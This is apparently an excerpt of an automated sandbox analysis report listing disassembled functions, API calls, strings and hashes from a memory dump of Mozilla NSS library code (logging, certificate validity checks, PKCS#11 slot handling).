                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                              • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                              • API String ID: 2013311973-4000297177
                                                              • Opcode ID: 5180f4ddd821b06f5b6db6f649dbc0ebed578047165c726c94e2409a0b299ce0
                                                              • Instruction ID: 9ebb95b33c015ba5dc877b7305e5e499d205c92e2eb391dcb46a1fb8aac9c6a0
                                                              • Opcode Fuzzy Hash: 5180f4ddd821b06f5b6db6f649dbc0ebed578047165c726c94e2409a0b299ce0
                                                              • Instruction Fuzzy Hash: A7518FB1D0821A9BEB00CBE5DC48BAE77F8AF05308F444128E919DB245F771D559CB93
                                                              Function 6D134C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C50
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C5B
                                                              • PR_smprintf.NSS3(6D20AAF9,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134C76
                                                              • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134CAE
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134CC9
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134CF4
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D134D0B
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134D5E
                                                              • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6D124F51,00000000), ref: 6D134D68
                                                              • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6D134D85
                                                              • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6D134DA2
                                                              • free.MOZGLUE(?), ref: 6D134DB9
                                                              • free.MOZGLUE(00000000), ref: 6D134DCF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$R_smprintf$strlen$Alloc_Util
                                                              • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                              • API String ID: 3756394533-2552752316
                                                              • Opcode ID: f1dccca850151e0a9cdf4cfa8aa8e866f0afc658faf456167ea94e200a5c4698
                                                              • Instruction ID: c2c4f9e77ca93fdfb198ab4a8e369bce48da80152637f50f288e2e4b218b62c4
                                                              • Opcode Fuzzy Hash: f1dccca850151e0a9cdf4cfa8aa8e866f0afc658faf456167ea94e200a5c4698
                                                              • Instruction Fuzzy Hash: 9F4191B1C0015667EB128F289C44B7B7A75AFAA718F074124FC154B30AE7B2D964C7E3
                                                              Function 6D0DDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6D0DDDDE
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6D0DDDF5
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6D0DDE34
                                                              • PR_Now.NSS3 ref: 6D0DDE93
                                                              • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6D0DDE9D
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0DDEB4
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0DDEC3
                                                              • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D0DDED8
                                                              • PR_smprintf.NSS3(%s%s,?,?), ref: 6D0DDEF0
                                                              • PR_smprintf.NSS3(6D20AAF9,(NULL) (Validity Unknown)), ref: 6D0DDF04
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0DDF13
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6D0DDF22
                                                              • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6D0DDF33
                                                              • free.MOZGLUE(00000000), ref: 6D0DDF3C
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0DDF4B
                                                              • free.MOZGLUE(00000000), ref: 6D0DDF74
                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D0DDF8E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                              • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                              • API String ID: 1882561532-3437882492
                                                              • Opcode ID: cf4b2ada9949026464c8bd6283135faf4b1b5daa7429a9403282c67abacf7f29
                                                              • Instruction ID: f5730b3194b05d88e18858a8ccba22e1202f446a1b83255ed445f82b2e8cbeda
                                                              • Opcode Fuzzy Hash: cf4b2ada9949026464c8bd6283135faf4b1b5daa7429a9403282c67abacf7f29
                                                              • Instruction Fuzzy Hash: 1B518FB1D043169BEB509E669C41B7F7AF9AF85758F15402AE809EB205F731D900CBF2
                                                              Function 6D112D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6D112DEC
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6D112E00
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D112E2B
                                                              • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6D112E43
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6D0E4F1C,?,-00000001,00000000,?), ref: 6D112E74
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6D0E4F1C,?,-00000001,00000000), ref: 6D112E88
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EC6
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EE4
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6D112EF8
                                                              • PR_Unlock.NSS3(?), ref: 6D112F62
                                                              • TlsGetValue.KERNEL32 ref: 6D112F86
                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6D112F9E
                                                              • PR_Unlock.NSS3(?), ref: 6D112FCA
                                                              • TlsGetValue.KERNEL32 ref: 6D11301A
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D11302E
                                                              • PR_Unlock.NSS3(?), ref: 6D113066
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D113085
                                                              • PR_Unlock.NSS3(?), ref: 6D1130EC
                                                              • TlsGetValue.KERNEL32 ref: 6D11310C
                                                              • EnterCriticalSection.KERNEL32(0000001C), ref: 6D113124
                                                              • PR_Unlock.NSS3(?), ref: 6D11314C
                                                                • Part of subcall function 6D0F9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6D12379E,?,6D0F9568,00000000,?,6D12379E,?,00000001,?), ref: 6D0F918D
                                                                • Part of subcall function 6D0F9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6D12379E,?,6D0F9568,00000000,?,6D12379E,?,00000001,?), ref: 6D0F91A0
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11316D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                              • String ID:
                                                              • API String ID: 3383223490-0
                                                              • Opcode ID: 2680ad8cec9995086a1d9f8bec537b44062629bbc3d8608eeff6ac1a8b942574
                                                              • Instruction ID: 04323c3912e41c4869e4a5fd354d675b455e71bcbbb66e05ae1cb4d760c78671
                                                              • Opcode Fuzzy Hash: 2680ad8cec9995086a1d9f8bec537b44062629bbc3d8608eeff6ac1a8b942574
                                                              • Instruction Fuzzy Hash: C4F1BFB5D042099FDF11DFA4DC45BAEBBB4BF0A318F054168EC04A7219E771E996CB81
                                                              Function 6D116CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6D116943
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6D116957
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6D116972
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6D116983
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6D1169AA
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6D1169BE
                                                                • Part of subcall function 6D116910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6D1169D2
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6D1169DF
                                                                • Part of subcall function 6D116910: NSSUTIL_ArgStrip.NSS3(?), ref: 6D116A5B
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D116D8C
                                                              • free.MOZGLUE(00000000), ref: 6D116DC5
                                                              • free.MOZGLUE(?), ref: 6D116DD6
                                                              • free.MOZGLUE(?), ref: 6D116DE7
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6D116E1F
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116E4B
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116E72
                                                              • free.MOZGLUE(?), ref: 6D116EA7
                                                              • free.MOZGLUE(?), ref: 6D116EC4
                                                              • free.MOZGLUE(?), ref: 6D116ED5
                                                              • free.MOZGLUE(00000000), ref: 6D116EE3
                                                              • free.MOZGLUE(?), ref: 6D116EF4
                                                              • free.MOZGLUE(?), ref: 6D116F08
                                                              • free.MOZGLUE(00000000), ref: 6D116F35
                                                              • free.MOZGLUE(?), ref: 6D116F44
                                                              • free.MOZGLUE(?), ref: 6D116F5B
                                                              • free.MOZGLUE(00000000), ref: 6D116F65
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6D11781D,00000000,6D10BE2C,?,6D116B1D,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C40
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6D11781D,?,6D10BE2C,?), ref: 6D116C58
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6D11781D), ref: 6D116C6F
                                                                • Part of subcall function 6D116C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6D116C84
                                                                • Part of subcall function 6D116C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6D116C96
                                                                • Part of subcall function 6D116C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6D116CAA
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116F90
                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D116FC5
                                                              • PK11_GetInternalKeySlot.NSS3 ref: 6D116FF4
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                              • String ID:
                                                              • API String ID: 1304971872-0
                                                              • Opcode ID: 3c9f0f6b65c896d2f41374976a68957363f1bbb3658627439c32eb7cf8dbe36e
                                                              • Instruction ID: d1527ce3368fbe476a157c29ea0967cd4d9407c75f1f691ed882d23eb0a7bf2a
                                                              • Opcode Fuzzy Hash: 3c9f0f6b65c896d2f41374976a68957363f1bbb3658627439c32eb7cf8dbe36e
                                                              • Instruction Fuzzy Hash: 8EB14CB1E0921E9FDF11CBA5DC44BAEBBB8BF15644F040134E815A7248E7B2E914CBE1
                                                              Function 6D114C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • TlsGetValue.KERNEL32 ref: 6D114C4C
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114C60
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114CA1
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6D114CBE
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114CD2
                                                              • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114D3A
                                                              • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114D4F
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6D114DB7
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07AD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07CD
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D05204A), ref: 6D0C07D6
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D05204A), ref: 6D0C07E4
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,6D05204A), ref: 6D0C0864
                                                                • Part of subcall function 6D0C07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D0C0880
                                                                • Part of subcall function 6D0C07A0: TlsSetValue.KERNEL32(00000000,?,?,6D05204A), ref: 6D0C08CB
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08D7
                                                                • Part of subcall function 6D0C07A0: TlsGetValue.KERNEL32(?,?,6D05204A), ref: 6D0C08FB
                                                              • TlsGetValue.KERNEL32 ref: 6D114DD7
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114DEC
                                                              • PR_Unlock.NSS3(?), ref: 6D114E1B
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D114E2F
                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D114E5A
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D114E71
                                                              • free.MOZGLUE(00000000), ref: 6D114E7A
                                                              • PR_Unlock.NSS3(?), ref: 6D114EA2
                                                              • TlsGetValue.KERNEL32 ref: 6D114EC1
                                                              • EnterCriticalSection.KERNEL32(?), ref: 6D114ED6
                                                              • PR_Unlock.NSS3(?), ref: 6D114F01
                                                              • free.MOZGLUE(00000000), ref: 6D114F2A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                              • String ID:
                                                              • API String ID: 759471828-0
                                                              • Opcode ID: 77921d4920b5e25d6fa0fbbb6780877121ed4a54ce7daaf3fb7db7788c323e37
                                                              • Instruction ID: 33648f6d164f67818f65f923a471a366f48b3fa65796ff6f16039a166adffbb0
                                                              • Opcode Fuzzy Hash: 77921d4920b5e25d6fa0fbbb6780877121ed4a54ce7daaf3fb7db7788c323e37
                                                              • Instruction Fuzzy Hash: E9B1FEB5A082069FEF11DF68DC88BAA77B4BF09718F024038ED1597354E7B4E961CB91
                                                              Function 6D0E5DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0E5DEC
                                                              • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6D0E5E0F
                                                              • PORT_ZAlloc_Util.NSS3(00000828), ref: 6D0E5E35
                                                              • SECKEY_CopyPublicKey.NSS3(?), ref: 6D0E5E6A
                                                              • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6D0E5EC3
                                                              • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6D0E5ED9
                                                              • SECKEY_SignatureLen.NSS3(?), ref: 6D0E5F09
                                                              • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6D0E5F49
                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6D0E5F89
                                                              • free.MOZGLUE(?), ref: 6D0E5FA0
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D0E5FB6
                                                              • free.MOZGLUE(00000000), ref: 6D0E5FBF
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0E600C
                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0E6079
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0E6084
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D0E6094
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                              • String ID:
                                                              • API String ID: 2310191401-3916222277
                                                              • Opcode ID: d31e008eecb1125d0320df19518d026c22b6533cfd41f4dc944ddf8a804ce92a
                                                              • Instruction ID: 93087b730c2d6c201e3be4d43847c7065a9c31493ec1f6d59796907b85232fe1
                                                              • Opcode Fuzzy Hash: d31e008eecb1125d0320df19518d026c22b6533cfd41f4dc944ddf8a804ce92a
                                                              • Instruction Fuzzy Hash: F981F179E042069FEB14CA64DC89B7FB7F4AF44394F054928E919A7391E771E900CBE1
                                                              Function 6D106D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_Digest), ref: 6D106D86
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D106DB4
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D106DC3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D106DD9
                                                              • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6D106DFA
                                                              • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6D106E13
                                                              • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6D106E2C
                                                              • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6D106E47
                                                              • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6D106EB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmpDownload File
